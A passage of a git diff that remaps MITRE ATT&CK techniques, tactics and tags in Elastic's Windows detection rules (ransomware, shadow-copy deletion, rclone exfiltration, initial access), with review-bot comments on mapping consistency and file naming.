Guide" -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -88,38 +81,11 @@ Windows scripts, often used for legitimate automation tasks, can be exploited by [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.007" -name = "JavaScript" -reference = "https://attack.mitre.org/techniques/T1059/007/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - - -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" 
@@ -130,10 +96,40 @@ id = "T1218.007" name = "Msiexec" reference = "https://attack.mitre.org/techniques/T1218/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/exfiltration_rclone_cloud_upload.toml b/rules/windows/exfiltration_rclone_cloud_upload.toml index 48377c25e27..0623bb45aa5 100644 --- a/rules/windows/exfiltration_rclone_cloud_upload.toml +++ b/rules/windows/exfiltration_rclone_cloud_upload.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -84,11 +84,17 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1048" name = "Exfiltration Over Alternative Protocol" reference = "https://attack.mitre.org/techniques/T1048/" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" diff --git a/rules/windows/exfiltration_smb_rare_destination.toml b/rules/windows/exfiltration_smb_rare_destination.toml index 1e007cf4c87..4c2598205f8 100644 --- a/rules/windows/exfiltration_smb_rare_destination.toml +++ b/rules/windows/exfiltration_smb_rare_destination.toml @@ -2,7 +2,7 @@ creation_date = "2023/12/04" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -61,18 +61,7 @@ references = ["https://www.securify.nl/en/blog/living-off-the-land-stealing-netn risk_score = 47 rule_id = "f580bf0a-2d23-43bb-b8e1-17548bb947ec" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Exfiltration", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" 
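Review bot: The added `T1567 Exfiltration Over Web Service` technique is mapped at the parent level only; rclone uploads to a cloud provider are more precisely the T1567.002 Exfiltration to Cloud Storage subtechnique, and the other entries in this patch map to a subtechnique wherever one exists (T1059.001, T1218.005, T1027.010), so a `[[rule.threat.technique.subtechnique]]` block under T1567 would keep the granularity consistent. The `query` body starts outside the hunk, so I can't confirm from here whether the rule matches only cloud-storage remotes or any rclone destination; if the latter, the parent-level mapping is the honest one and a comment in the rule `note` saying so would prevent the next reviewer from re-raising this.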
@@ -117,17 +106,16 @@ event.category:network and host.os.type:windows and process.pid:4 and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1048" -name = "Exfiltration Over Alternative Protocol" -reference = "https://attack.mitre.org/techniques/T1048/" +[[rule.threat.technique]] +id = "T1187" +name = "Forced Authentication" +reference = "https://attack.mitre.org/techniques/T1187/" [rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [rule.new_terms] field = "new_terms_fields" value = ["destination.ip"] diff --git a/rules/windows/impact_backup_file_deletion.toml b/rules/windows/impact_backup_file_deletion.toml index 445c8897378..18ea2498d68 100644 --- a/rules/windows/impact_backup_file_deletion.toml +++ b/rules/windows/impact_backup_file_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/01" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/27" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -107,19 +107,13 @@ file where host.os.type == "windows" and event.type == "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules/windows/impact_deleting_backup_catalogs_with_wbadmin.toml b/rules/windows/impact_deleting_backup_catalogs_with_wbadmin.toml index 8c1e77cc3b5..680f7b7dad8 100644 --- a/rules/windows/impact_deleting_backup_catalogs_with_wbadmin.toml +++ b/rules/windows/impact_deleting_backup_catalogs_with_wbadmin.toml 
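Review bot: The Exfiltration mapping (T1048 / TA0010) is replaced by Forced Authentication (T1187 / TA0006) rather than kept alongside it, so a `new_terms` rule on `destination.ip` for kernel-mode (`process.pid:4`) SMB connections to a never-before-seen host now carries only the NTLM-leak interpretation, while the same signal is also how data leaves over SMB shares — which is what the file name `exfiltration_smb_rare_destination.toml` still says. The NetNTLM-stealing reference in the context line supports adding T1187, but not removing T1048. Consider retaining T1048 as a second `[[rule.threat]]` block (and keeping `"Tactic: Exfiltration"` in the tags hunk `@@ -61,18 +61,7 @@` above) or renaming the file so its prefix matches its sole tactic.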
@@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/05/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -93,19 +93,13 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules/windows/impact_high_freq_file_renames_by_kernel.toml b/rules/windows/impact_high_freq_file_renames_by_kernel.toml index e2d3edbbce1..ef82bc6c119 100644 --- a/rules/windows/impact_high_freq_file_renames_by_kernel.toml +++ b/rules/windows/impact_high_freq_file_renames_by_kernel.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/03" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -54,14 +54,7 @@ references = ["https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomwa risk_score = 47 rule_id = "1397e1b9-0c90-4d24-8d7b-80598eb9bc9a" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Impact", - "Resources: Investigation Guide", - "Data Source: Elastic Defend" -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Impact", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: Elastic Defend"] timestamp_override = "event.ingested" type = "esql" 
@@ -86,22 +79,25 @@ from logs-endpoint.events.file-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" +[[rule.threat.technique]] +id = "T1486" +name = "Data Encrypted for Impact" +reference = "https://attack.mitre.org/techniques/T1486/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" @@ -111,5 +107,3 @@ reference = "https://attack.mitre.org/techniques/T1021/002/" id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - - diff --git a/rules/windows/impact_mod_critical_os_files.toml b/rules/windows/impact_mod_critical_os_files.toml index 7aa911b6309..96426b8ec98 100644 --- a/rules/windows/impact_mod_critical_os_files.toml +++ b/rules/windows/impact_mod_critical_os_files.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/01" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/01" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -55,20 +55,7 @@ This rule identifies attempts to delete or modify critical files used during the risk_score = 73 rule_id = "1a3f2a4c-12d0-4b88-961a-2711ee295637" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Impact", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -93,18 +80,23 @@ file where host.os.type == "windows" and event.type in ("change", "deletion") an [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" + [[rule.threat.technique]] -id = "T1490" -name = "Inhibit System Recovery" -reference = "https://attack.mitre.org/techniques/T1490/" +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" +[[rule.threat.technique.subtechnique]] +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules/windows/impact_ransomware_file_rename_smb.toml b/rules/windows/impact_ransomware_file_rename_smb.toml index 7f585c29ae5..7134610ebc1 100644 --- a/rules/windows/impact_ransomware_file_rename_smb.toml +++ b/rules/windows/impact_ransomware_file_rename_smb.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/05/02" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -55,14 +55,7 @@ references = ["https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomwa risk_score = 73 rule_id = "78e9b5d5-7c07-40a7-a591-3dbbf464c386" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Impact", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Impact", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: Elastic Defend"] timestamp_override = "event.ingested" type = "eql" @@ -82,36 +75,31 @@ sequence by host.id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] -id = "T1490" -name = "Inhibit System Recovery" -reference = "https://attack.mitre.org/techniques/T1490/" - +id = "T1486" +name = "Data Encrypted for Impact" +reference = "https://attack.mitre.org/techniques/T1486/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/impact_ransomware_note_file_over_smb.toml b/rules/windows/impact_ransomware_note_file_over_smb.toml index 392a87fdba2..e37debd4886 100644 
--- a/rules/windows/impact_ransomware_note_file_over_smb.toml +++ b/rules/windows/impact_ransomware_note_file_over_smb.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/02" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -55,14 +55,7 @@ note = """## Triage and analysis risk_score = 73 rule_id = "02bab13d-fb14-4d7c-b6fe-4a28874d37c5" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Impact", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Impact", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: Elastic Defend"] timestamp_override = "event.ingested" type = "eql" @@ -82,36 +75,31 @@ sequence by host.id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] -id = "T1490" -name = "Inhibit System Recovery" -reference = "https://attack.mitre.org/techniques/T1490/" - +id = "T1486" +name = "Data Encrypted for Impact" +reference = "https://attack.mitre.org/techniques/T1486/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - 
diff --git a/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml b/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml index 073eef3b42a..ea585c8adc0 100644 --- a/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml +++ b/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -118,31 +118,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1490" -name = "Inhibit System Recovery" -reference = "https://attack.mitre.org/techniques/T1490/" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1490" +name = "Inhibit System Recovery" +reference = "https://attack.mitre.org/techniques/T1490/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml b/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml index 3298b577ca8..16078000044 100644 --- a/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml 
+++ b/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -112,26 +112,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1490" -name = "Inhibit System Recovery" -reference = "https://attack.mitre.org/techniques/T1490/" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" reference = "https://attack.mitre.org/techniques/T1047/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1490" +name = "Inhibit System Recovery" +reference = "https://attack.mitre.org/techniques/T1490/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml b/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml index 83b0ab0edd9..5fa8548e79a 100644 --- a/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml +++ b/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/03" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -63,14 +63,7 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -111,41 +104,18 @@ sequence by user.id with maxspan=2m [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" + [[rule.threat.technique.subtechnique]] id = "T1027.006" name = "HTML Smuggling" reference = "https://attack.mitre.org/techniques/T1027/006/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/initial_access_execution_from_inetcache.toml b/rules/windows/initial_access_execution_from_inetcache.toml index 1c10e770968..2d001fa4a96 100644 --- a/rules/windows/initial_access_execution_from_inetcache.toml 
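Review bot: The `tags` array in the severity hunk is collapsed onto a single line, while the removed lines and the rest of the rule set keep one tag per line; if the repository's TOML normalizer wraps long arrays, this line will be rewritten on the next formatting pass and produce a noisy follow-up diff. The same single-line `tags` form appears in the tags hunks of initial_access_execution_from_inetcache.toml, initial_access_execution_from_removable_media.toml, initial_access_execution_remote_via_msiexec.toml and the remaining rule files in this patch. Separately, after the threat hunk this file maps only `Defense Evasion` (TA0005) although its path still carries the `initial_access_` prefix; if the naming convention ties the prefix to the first tactic, a rename or a short sentence in the rule `description` explaining the re-mapping would keep them aligned.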
+++ b/rules/windows/initial_access_execution_from_inetcache.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/14" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,21 +66,7 @@ references = [ risk_score = 73 rule_id = "dca6b4b0-ae70-44eb-bb7a-ce6db502ee78" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Command and Control", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -113,31 +99,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" +[[rule.threat.technique]] +id = "T1189" +name = "Drive-by Compromise" +reference = "https://attack.mitre.org/techniques/T1189/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/windows/initial_access_execution_from_removable_media.toml b/rules/windows/initial_access_execution_from_removable_media.toml index 839778a74ba..202f92da7e0 100644 --- a/rules/windows/initial_access_execution_from_removable_media.toml +++ b/rules/windows/initial_access_execution_from_removable_media.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/27" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -19,14 +19,7 @@ name = "Execution from a Removable Media with Network Connection" risk_score = 21 rule_id = "1542fa53-955e-4330-8e4d-b2d812adeb5f" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -80,14 +73,26 @@ Removable media, like USB drives, are often used for data transfer but can be ex [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1091" name = "Replication Through Removable Media" reference = "https://attack.mitre.org/techniques/T1091/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1091" +name = "Replication Through Removable Media" +reference = "https://attack.mitre.org/techniques/T1091/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/initial_access_execution_remote_via_msiexec.toml b/rules/windows/initial_access_execution_remote_via_msiexec.toml index 313b2343f65..63ecc9b7169 100644 --- a/rules/windows/initial_access_execution_remote_via_msiexec.toml +++ b/rules/windows/initial_access_execution_remote_via_msiexec.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -18,15 +18,7 @@ name = "Potential Remote File Execution via MSIEXEC" risk_score = 21 rule_id = "3e441bdb-596c-44fd-8628-2cfdf4516ada" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -101,36 +93,18 @@ MSIEXEC, the Windows Installer, facilitates software installation, modification, [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.007" name = "Msiexec" reference = "https://attack.mitre.org/techniques/T1218/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/initial_access_execution_via_office_addins.toml b/rules/windows/initial_access_execution_via_office_addins.toml index ce76d88f67f..4ee5330946f 100644 --- a/rules/windows/initial_access_execution_via_office_addins.toml +++ b/rules/windows/initial_access_execution_via_office_addins.toml 
@@ -2,7 +2,7 @@ creation_date = "2023/03/20" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -63,19 +63,7 @@ references = [ risk_score = 47 rule_id = "ae8a142c-6a1d-4918-bea7-0b617e99ecfa" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Persistence", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
